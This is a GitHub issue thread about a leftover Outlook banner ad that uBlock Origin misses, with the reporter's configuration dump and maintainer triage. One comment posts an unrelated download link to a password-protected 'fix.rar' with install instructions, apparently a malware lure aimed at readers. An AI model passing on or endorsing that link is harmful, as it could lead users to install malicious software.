### ISSUE TITLE
outlook.live.com: ads

### ISSUE THREAD

**Issue by Avenred** [uBlockOrigin/uAssets#25055]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://outlook.live.com/mail/0/`

### Category

ads

### Description

A leftover of a banner ad appears at the bottom when the window is resized to be smaller.

### Other extensions used

Violentmonkey (no scripts installed for Outlook)

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

https://files.catbox.moe/mxek5z.png

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Firefox: 129
filterset (summary):
 network: 160782
 cosmetic: 141193
 scriptlet: 30668
 html: 2191
listset (total-discarded, last-updated):
 added:
  adguard-cookies: 31296-49, 1m
  ublock-cookies-adguard: 1680-28, 1m
  adguard-social: 23349-52, 1m
  adguard-popup-overlays: 27879-1063, 1m
  adguard-mobile-app-banners: 5422-27, 1m
  adguard-other-annoyances: 14914-461, 1m
  adguard-widgets: 2649-18, 1m
  ublock-annoyances: 5925-12, now
 default:
  user-filters: 1-0, never
  ublock-filters: 39751-127, 15m Δ
  ublock-badware: 10750-6, 15m Δ
  ublock-privacy: 1065-4, 15m Δ
  ublock-unbreak: 2566-2, 15m Δ
  ublock-quick-fixes: 203-4, 15m Δ
  easylist: 85555-181, 15m Δ
  easyprivacy: 53048-81, 15m Δ
  urlhaus-1: 28500-0, 1h.15m
  plowe-0: 3545-994, 1m
filterset (user): [array of 1 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 1610 ms
 maxAssetCacheWait: 793 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 4
 network:
  live.com: 1
  adnxs.com: 1
  microsoft.com: 2
 extended:
  ##div[class][tabindex="-1"][role="region"][aria-label][data-min-…
  ###MainModule div[data-max-width="2400"] + div[class]
  ###app div[class] > div[role="region"] ~ div[class]:not([data-ma…
  ##body:style(overflow: auto !important)
  ##body:style(overflow:auto !important;)
```
</details>

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Oqarshi** [comment]
Damn:
![image](https://github.com/user-attachments/assets/91f37855-4d08-492a-b40f-bfe220678189)
![image](https://github.com/user-attachments/assets/69efb02d-81a6-41f6-884c-533bbc10cf04)

**Comment by Avenred** [comment]
If you're having trouble reproducing this, create an account on Outlook then look at your inbox. This only happens when the browser window's width is smaller than about 1/2 of your screen. If you're looking at this with a maximized browser window, the issue will not appear. You have to resize it to be smaller.

**Comment by mapx-** [comment]
I have an account, still cannot reproduce your issue.
Try resetting your uBO to defaults, do not add any other list, disable all other extensions, test again.
